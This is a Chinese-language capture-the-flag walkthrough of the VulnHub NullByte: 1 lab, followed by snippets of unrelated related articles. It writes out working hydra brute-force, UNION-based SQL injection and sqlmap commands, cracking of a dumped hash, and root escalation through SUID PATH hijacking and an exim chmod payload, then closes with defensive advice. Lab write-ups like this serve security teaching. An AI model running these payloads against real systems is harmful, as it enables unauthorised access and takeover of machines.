NullByte: 1靶场渗透
NullByte: 1
来自 <NullByte: 1 ~ VulnHub>
1,将两台虚拟机网络连接都改为NAT模式
2,攻击机上做namp局域网扫描发现靶机
nmap -sn 192.168.23.0/24
那么攻击机IP为192.168.23.182,靶场IP192.168.23.221
3,对靶机进行端口服务探测
nmap -sV -T4 -p- -A 192.168.23.221
访问80端口开放的http服务
4,对网站子目录进行枚举爆破扫描
dirsearch -u http://192.168.23.221 -x 403,404
进行端口漏洞扫描
nmap --script=vuln -p 80,111,777,59147 192.168.23.221
5,访问存在的网页目录
http://192.168.23.221/phpmyadmin/
查看默认页面源代码
下载图片由此得到重要提示
wget http://192.168.23.221/main.gif
exiftool main.gif
没想到是网站的一个目录,访问之
http://192.168.23.221/kzMb5nVYJw/
6,尝试使用hydra爆破出key值
gunzip /usr/share/wordlists/rockyou.txt.gz
hydra 192.168.23.221 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l bossfrank -P /usr/share/wordlists/rockyou.txt
登录成功
http://192.168.23.221/kzMb5nVYJw/index.php
访问这个网站 http://192.168.23.221/kzMb5nVYJw/420search.php
7,输入用户名isis
观察网页结构,合理怀疑网站通过GET请求传入的用户名进行相应的sql查询,那么可以测试时候网站对单双引号敏感,也就是是否存在sql注入。输入双引号,发现报错,而单引号不报错
"--+ 发现不报错,说明是单引号GET型注入
开始进行手工注入
"%20order%20by%203--+
"%20order%20by%204--+
通过sql注入判断网站至少存在3行,但又小于4行
然后通过union select判断回显位置
" union select 1,2,3--+
爆出数据库名,数据库版本,还有当前用户
" union select database(),version(),user() -- -
爆出数据库系统下所有的数据库名
" union select table_schema, 2, 3 from information_schema.tables -- -
知道了数据库名为seth,接下来从记录了所有数据表名的总表中爆出seth下所有数据表
" union select table_name,2,3 from information_schema.tables where table_schema='seth' -- -
知道了数据表名为users,接下来从记录了所有字段名的总表中爆出字段名
" union select column_name,2,3 from information_schema.columns where table_schema='seth' and table_name='users' -- -
从users数据表爆出id,user,pass字段的内容
" union select id,user,pass from users -- -
由此爆出来ramses的密码YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE
也可以使用sqlmap自动化注入
sqlmap -u 'http://192.168.23.221/kzMb5nVYJw/420search.php?usrtosearch=' --dbs
sqlmap -u 'http://192.168.23.221/kzMb5nVYJw/420search.php?usrtosearch=' -D seth --tables
sqlmap -u 'http://192.168.23.221/kzMb5nVYJw/420search.php?usrtosearch=' -D seth -T users --columns
sqlmap -u 'http://192.168.23.221/kzMb5nVYJw/420search.php?usrtosearch=' --dump
8,判断这段密文的加密方式,首先base64解码
echo 'YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE' |base64 -d
解得 c6d6bd7ebf806f43c76acc3681703b81
hash-identifier 'c6d6bd7ebf806f43c76acc3681703b81'
判断出来是MD5值,然后使用MD5解密网站,解密得到ramses的密码omega
9,然后使用ssh登录ramses用户,端口需要指定777
ssh ramses@192.168.23.221 -p 777
信息收集一下,查看这个用户运行过的命令
发现跑过一个文件,去查看一下是什么东西
不知道是做什么,但是发现当前用户是可以执行这个文件的,执行之
sudo
find / -perm -4000 2>/dev/null
这个文件具有suid权限,可以被提权利用
可能的提权利用点:
- procwatch SUID程序路径劫持
- 该程序调用ps命令但未使用绝对路径
- 通过PATH环境变量劫持执行恶意ps
利用步骤:
# 在可写目录创建恶意ps脚本
echo '/bin/bash -p' > /tmp/ps
chmod +x /tmp/ps
# 劫持PATH变量并执行procwatch
export PATH=/tmp:$PATH
/var/www/backup/procwatch
2,pkexec提权 (CVE-2021-4034)
- 检查pkexec版本是否低于0.105
- 使用已知漏洞利用代码提权
3,exim4提权 (CVE-2016-1531)
- 检查exim版本是否为4.84-3
- 执行payload:sudo exim -ps '$(chmod +s /bin/bash)'
4,利用at命令
- 创建定时任务获取root shell
echo '/bin/bash -p' | at now
最可能成功的路径是procwatch的PATH劫持,因为:
- 该程序位于web目录且具有SUID
- 输出结果包含ps命令的输出
- 典型路径配置漏洞特征
10,尝试提权
ln -s /bin/sh ps
ls -la
export PATH=.:$PATH
./procwatch
成功变为root用户
该提权过程利用了SUID程序的环境变量路径劫持漏洞,具体原理如下:
- SUID权限特性
- procwatch是root拥有的SUID程序(权限4755)
- 执行时会以root身份运行(即使由普通用户启动)
- 符号链接劫持
ln -s /bin/sh ps
- 在当前目录创建名为ps的符号链接,指向/bin/sh(系统shell)
- PATH环境变量污染
export PATH=.:$PATH
- 将当前目录设为PATH搜索路径的最高优先级
- 系统执行命令时会优先在当前目录查找
- 恶意调用链
./procwatch
触发过程:
procwatch (root权限运行)
→ 调用系统命令 `ps`
→ 根据PATH优先查找当前目录
→ 执行当前目录的伪ps程序
→ 实际执行 /bin/sh
→ 继承root权限启动shell
- 提权成功验证
- 新启动的shell进程UID=0(root)
- 可执行whoami验证身份
- 能够访问所有受保护的系统资源
关键漏洞点:
- SUID程序未使用绝对路径调用系统命令(/bin/ps)
- 允许用户控制PATH环境变量
- 当前目录具有可写权限
防御建议:
- 对于SUID程序:
- 始终使用绝对路径调用外部命令
- 清除危险环境变量(sanitize environment)
- 通过chroot限制文件系统访问
- 系统安全配置:
- 在/etc/sudoers中设置 secure_path
- 避免将可写目录加入PATH
- 定期审计SUID/SGID文件
相关文章:
NullByte: 1靶场渗透
NullByte: 1 来自 <NullByte: 1 ~ VulnHub> 1,将两台虚拟机网络连接都改为NAT模式 2,攻击机上做namp局域网扫描发现靶机 nmap -sn 192.168.23.0/24 那么攻击机IP为192.168.23.182,靶场IP192.168.23.221 3,对靶机进行端口服…...
2025.4.1英语听力
https://www.bilibili.com/video/BV1Aw411r7zt?spm_id_from333.788.videopod.sections&vd_sourcedc8ca95ef058b5ce2b5233842ac41f4bhttps://www.bilibili.com/video/BV1Aw411r7zt?spm_id_from333.788.videopod.sections&vd_sourcedc8ca95ef058b5ce2b5233842ac41f4b …...
Kafka 实战指南:原理剖析与高并发场景设计模式
一、介绍 Kafka是由 Apache 软件基金会开发的开源流处理平台,作为高吞吐量的分布式发布订阅消息系统,采用 Scala 和 Java 编写。 Kafka是一种消息服务(MQ),在理论上可以达到十万的并发。 代表的MQ软件—— kafka 十万…...
大型语言模型Claude的“思维模式”最近被公开解剖
每周跟踪AI热点新闻动向和震撼发展 想要探索生成式人工智能的前沿进展吗?订阅我们的简报,深入解析最新的技术突破、实际应用案例和未来的趋势。与全球数同行一同,从行业内部的深度分析和实用指南中受益。不要错过这个机会,成为AI领…...
安装windows server 2016没有可选硬盘,设备安装过ubuntu系统
如果在安装 Windows Server 2016 时无法识别已安装过 Ubuntu 的硬盘,可能是由于硬盘分区格式(如 ext4)与 Windows 不兼容,或缺少必要的驱动程序。以下是详细的解决方案: 1. 检查 BIOS/UEFI 设置 确认硬盘模式 • 重启电…...
)
贡献法(C++)
贡献法的核心思想: 不要一个个子串去算“有多少种字符”,而是反过来想——每个字符能“贡献”给多少个子串 1.子串分值 #include<bits/stdc.h> #define int long long using namespace std; string s; int sum0; signed main() {cin>>s;for…...
Spring Event 观察者模型及事件和消息队列之间的区别笔记
Spring Event观察者模型:基于内置事件实现自定义监听 在Spring框架中,观察者模式通过事件驱动模型实现,允许组件间通过事件发布与监听进行解耦通信。这一机制的核心在于ApplicationEvent、ApplicationListener和ApplicationEventPublisher等接…...
【Nova UI】三、探秘 BEM:解锁前端 CSS 命名的高效密码
序言 在上一篇文章中,我们一步一个脚印,扎实地完成了 Vue 组件库搭建的环境搭建工作,从 pnpm 的精妙运用到 TypeScript 的细致配置✍️,每个环节都为组件库的诞生筑牢根基。现在,当我们把目光聚焦到组件库的样式设计时…...
Qt中存储多规则形状图片
在Qt中,您可以通过多种方式处理和存储具有非矩形(多规则形状)的图片。以下是几种主要实现方案: 1. 使用透明通道存储不规则形状 实现方法 // 创建带透明背景的QPixmap QPixmap pixmap(400, 400); pixmap.fill(Qt::transparent);QPainter painter(&…...
前端界面在线excel编辑器 。node编写post接口获取文件流,使用传参替换表格内容展示、前后端一把梭。
首先luckysheet插件是支持在线替换excel内容编辑得但是浏览器无法调用本地文件,如果只是展示,让后端返回文件得二进制文件流就可以了,直接使用luckysheet展示。 这里我们使用xlsx-populate得node简单应用来调用本地文件,自己写一个…...
核心知识——Spark核心数据结构:RDD
引入 通过前面的学习,我们对于Spark已经有一个基本的认识,并且搭建了一个本地的练习环境,因为本专栏的主要对象是数仓和数分,所以就不花大篇幅去写环境搭建等内容,当然,如果感兴趣的小伙伴可以留言&#x…...
Python如何为区块链治理注入智能与高效?
Python如何为区块链治理注入智能与高效? 引言 区块链治理作为一个新兴领域,旨在解决去中心化网络中的决策与协调问题。无论是以太坊的协议升级,还是DAO(去中心化自治组织)内部的投票机制,治理效率与公正性始终是核心挑战。然而,Python的灵活性与强大的生态系统为区块链…...
)
树莓派 —— 在树莓派4b板卡下编译FFmpeg源码,支持硬件编解码器(mmal或openMax硬编解码加速)
🔔 FFmpeg 相关音视频技术、疑难杂症文章合集(掌握后可自封大侠 ⓿_⓿)(记得收藏,持续更新中…) 正文 1、准备工作 (1)树莓派烧录RaspberryPi系统 (2)树莓派配置固定IP(文末) (3)xshell连接树莓派 (4)...
【Easylive】auditVideo方法详细解析
【Easylive】项目常见问题解答(自用&持续更新中…) 汇总版 auditVideo 方法是视频审核的核心方法,负责处理视频审核状态的变更、用户积分奖励、数据同步以及文件清理等操作。下面我将从功能、流程、设计思路等方面进行全面解析。 1. 方…...
【数据分享】中国3254座水库集水区特征数据集(免费获取)
水库在水循环、碳通量、能量平衡中扮演关键角色,实实在在地影响着我们的生活。其功能和环境影响高度依赖于地理位置、上游流域属性(如地形、气候、土地类型)和水库自身的动态特征(如水位、蒸发量)。但在此之前一直缺乏…...
Maven安装与配置完整指南
Maven安装与配置完整指南 1. 前言 Apache Maven 是一个强大的项目管理和构建工具,广泛应用于Java项目开发。它通过 POM(Project Object Model) 文件管理项目依赖,并提供了标准化的构建流程。 本文详细介绍 Maven的下载、安装、环境配置、镜像加速、IDE集成 以及 常见问题…...
我用Axure画了一个富文本编辑器,还带交互
最近尝试用Axure RP复刻了一个富文本编辑器,不仅完整还原了工具栏的各类功能,还通过交互设计实现了接近真实编辑器操作体验。整个设计过程聚焦功能还原与交互流畅性,最终成果令人惊喜。 编辑器采用经典的三区布局:顶部工具栏集成了…...
Uniapp自定义TabBar组件全封装实践与疑难问题解决方案
前言 在当前公司小程序项目中,我们遇到了一个具有挑战性的需求:根据不同用户身份动态展示差异化的底部导航栏(TabBar) 。这种多角色场景下的UI适配需求,在提升用户体验和实现精细化运营方面具有重要意义。 在技术调研…...
【PCB工艺】软件是如何控制硬件的发展过程
软件与硬件的关系密不可分,软件的需求不断推动硬件的发展,而硬件的进步又为软件创新提供了基础。 时光回溯到1854年,亨利戈培尔发明了电灯泡(1879年,托马斯阿尔瓦爱迪生找到了更合适的材料研制出白炽灯。)…...
Javascript代码压缩混淆工具terser详解
原始的JavaScript代码在正式的服务器上,如果没有进行压缩,混淆,不仅加载速度比较慢,而且还存在安全和性能问题. 因此现在需要进行压缩,混淆处理. 处理方案简单描述一下: 1. 使用 terser 工具进行 安装 terser工具: # npm 安装 npm install terser --save-dev# 或使用 yarn 安…...
【教程】如何利用bbbrisk一步一步实现评分卡
利用bbbrisk一步一步实现评分卡 一、什么是评分卡1.1.什么是评分卡1.2.评分卡有哪些 二、评分卡怎么弄出来的2.1.如何制作评分卡2.2.制作评分卡的流程 三、变量的分箱3.1.数据介绍3.2.变量自动分箱3.3.变量的筛选 四、构建评分卡4.1.评分卡实现代码4.2.评分卡表4.3.阈值表与分数…...
RAG优化:python从零实现Proposition Chunking[命题分块]让 RAG不再“断章取义”,从此“言之有物”!
🧠 向所有学习者致敬! “学习不是装满一桶水,而是点燃一把火。” —— 叶芝 我的博客主页: https://lizheng.blog.csdn.net 🌐 欢迎点击加入AI人工智能社区! 🚀 让我们一起努力,共创AI未来! 🚀 大家好,本篇要聊的是一个让 RAG不再“断章取义”的神奇技术——命…...
丝杆,同步带,链条选型(我要自学网)
这里的选型可以70%的正确率,正确率不高,但是选型速度会比较快。 1.丝杆选型 后面还有一堆计算公式,最终得出的结果是导程25,轴径25mm的丝杆。 丝杆选择长度时,还要注意细长比,长度/直径 一般为30到50。 2…...
【YOLO系列】基于YOLOv8的无人机野生动物检测
基于YOLOv8的无人机野生动物检测 1.前言 在野生动物保护、生态研究和环境监测领域,及时、准确地检测和识别野生动物对于保护生物多样性、预防人类与野生动物的冲突以及制定科学的保护策略至关重要。传统的野生动物监测方法通常依赖于地面巡逻、固定摄像头或无线传…...
一文详细讲解Python(详细版一篇学会Python基础和网络安全)
引言 在当今数字化时代,Python 作为一种简洁高效且功能强大的编程语言,广泛应用于各个领域,从数据科学、人工智能到网络安全等,都能看到 Python 的身影。而网络安全作为保障信息系统和数据安全的关键领域,其重要性不言…...
NFS 重传次数速率监控
这张图展示的是 NFS 重传次数速率监控,具体解释如下: 1. 指标含义 监控指标 node_nfs_rpc_retransmissions_total 统计 NFS(网络文件系统)通信中 RPC(远程过程调用)的重传次数,rate(node_nfs_…...
【Java】Hibernate的一级缓存
Session是有一个缓存, 又叫Hibernate的一级缓存 session缓存是由一系列的Java集合构成的。当一个对象被加入到Session缓存中,这个对象的引用就加入到了java的集合中,以后即使应用程序中的引用变量不再引用该对象,只要Session缓存不被清空&…...
学习笔记--(6)
import numpy as np import matplotlib.pyplot as plt from scipy.special import erfc# 设置参数 rho 0.7798 z0 4.25 # 确保使用大写 Z0,与定义一致def calculate_tau(z, z_prime, rho, s_values):return np.log(rho * z * z_prime * s_values / 2)# 定义 chi_…...
【QT5 网络编程示例】TCP 通信
文章目录 TCP 通信 TCP 通信 QT主要通过QTcpSocket 和 QTcpServer两个类实现服务器和客户端的TCP 通信。 QTcpSocket 是 Qt 提供的套接字类,看用于建立、管理和操作 TCP 连接。 常用方法 connectToHost(host, port):连接到指定服务器。disconnectFro…...
JWT在线解密/JWT在线解码 - 加菲工具
JWT在线解密/JWT在线解码 首先进入加菲工具 选择 “JWT 在线解密/解码” https://www.orcc.top 或者直接进入JWT 在线解密/解码 https://www.orcc.top/tools/jwt 进入功能页面 使用 输入对应的jwt内容,点击解码按钮即可...